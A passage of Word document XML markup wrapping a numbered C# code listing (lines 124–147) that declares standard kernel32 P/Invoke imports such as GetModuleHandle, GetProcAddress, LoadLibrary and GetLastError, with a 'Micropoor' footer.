        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>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124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DllImport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(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"kernel32"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]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="413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125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private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static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extern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IntPtr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GetModuleHandle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(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126</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="28" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="7492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127</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="21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string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moduleName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128</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="28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129</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>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130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DllImport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(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"kernel32"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]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="425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131</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="26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private</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="3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static</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="3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extern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UInt32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="3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GetProcAddress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(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132</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="28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133</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="21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IntPtr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="29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hModule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="316" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="7732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134</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="1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string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procName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135</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="58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136</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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137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DllImport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(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"kernel32"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]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="316" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="461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138</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="25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private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static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extern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UInt32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LoadLibrary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(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139</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="58" w:after="0" w:line="316" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="7492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140</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="21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string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lpFileName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141</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="58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142</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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143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DllImport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(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"kernel32"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]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="316" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="425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144</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="26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private</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="3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static</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="3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extern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UInt32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="3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GetLastError</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;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145</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="25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146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147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}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5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7" w:lineRule="auto"/>
        <w:ind w:left="9599" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="20"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Micr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="19"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>opoor</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:type w:val="continuous"/>
      <w:pgSz w:w="1192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